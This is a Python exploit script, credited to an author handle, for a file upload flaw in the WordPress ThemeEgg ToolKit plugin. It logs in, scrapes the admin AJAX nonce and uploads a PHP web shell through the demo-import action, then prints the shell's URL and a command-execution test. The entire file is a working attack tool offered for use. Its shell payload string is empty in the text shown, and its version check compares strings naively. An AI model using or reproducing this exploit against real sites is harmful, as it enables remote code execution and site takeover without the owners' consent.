import argparse import re import time import requests from bs4 import BeautifulSoup #by Nxploit | Khaled Alenazi requests.packages.urllib3.disable_warnings() session = requests.Session() session.verify = False def display_banner(): banner = """ ..######..##.....##.########..........#######....#####....#######..########..........#######...#######...#######.....##...######## .##....##.##.....##.##...............##.....##..##...##..##.....##.##...............##.....##.##.....##.##.....##..####...##...... .##.......##.....##.##......................##.##.....##........##.##......................##.##.....##.##.....##....##...##...... .##.......##.....##.######...#######..#######..##.....##..#######..#######..#######..#######...#######...########....##...#######. .##........##...##..##...............##........##.....##.##..............##.........##........##.....##........##....##.........## .##....##...##.##...##...............##.........##...##..##........##....##.........##........##.....##.##.....##....##...##....## ..######.....###....########.........#########...#####...#########..######..........#########..#######...#######...######..######. Exploit by : Khaled Alenazi ,Nxploit """ print(banner) def check_version(url): version_url = f"{url}/wp-content/plugins/themeegg-toolkit/readme.txt" response = requests.get(version_url, headers={"User-Agent": "Mozilla/5.0"}, verify=False) if response.status_code == 200: match = re.search(r'Stable tag: (\d+\.\d+\.\d+)', response.text) if match and match.group(1) <= "1.2.9": print(f"[+] Vulnerable version detected: {match.group(1)}") time.sleep(3) return True print("[-] The target does not appear to be vulnerable.") return False def login(url, username, password, session): login_url = f"{url}/wp-login.php" login_data = {"log": username, "pwd": password, "rememberme": "forever", "wp-submit": "Log In"} response = session.post(login_url, data=login_data, headers={"User-Agent": "Mozilla/5.0"}, verify=False) return any('wordpress_logged_in' in cookie.name for cookie in session.cookies) def get_security_nonce(url, session): settings_page = session.get(f"{url}/wp-admin/themes.php?page=themeegg-toolkit", headers={"User-Agent": "Mozilla/5.0"}) soup = BeautifulSoup(settings_page.text, "html.parser") for script in soup.find_all("script"): match = re.search(r'"ajax_nonce":"(\w+)"', script.text) if match: return match.group(1) return None def exploit(url, username, password): if not check_version(url): return if login(url, username, password, session): print("[+] Logged in successfully.") else: print("[-] Failed to log in.") return nonce_value = get_security_nonce(url, session) if not nonce_value: print("[-] Failed to extract security nonce.") return print(f"[+] Found security nonce: {nonce_value}") shell_code = "" files = { "action": (None, "TETK_import_demo_data"), "security": (None, nonce_value), "customizer_file": ("shell.php", shell_code, "application/x-php") } upload_url = f"{url}/wp-admin/admin-ajax.php" print("[*] Uploading Web Shell...") response = session.post(upload_url, files=files, headers={"User-Agent": "Mozilla/5.0"}, verify=False) time.sleep(3) if response.status_code == 200: print("[+] Web Shell uploaded successfully!") shell_path = f"{url}/wp-content/uploads/2025/03/shell.php" print(f"[+] Potential Web Shell location: {shell_path}") print(f"[*] Test command: {shell_path}?cmd=id") else: print("[-] File upload failed. Check if you have sufficient privileges or if there are additional protections.") if __name__ == "__main__": display_banner() parser = argparse.ArgumentParser(description="Exploit for ThemeEgg ToolKit File Upload Vulnerability") parser.add_argument("-u", "--url", required=True, help="Target WordPress URL (e.g., http://192.168.100.74:888/wordpress)") parser.add_argument("-un", "--username", required=True, help="WordPress username") parser.add_argument("-p", "--password", required=True, help="WordPress password") args = parser.parse_args() exploit(args.url, args.username, args.password)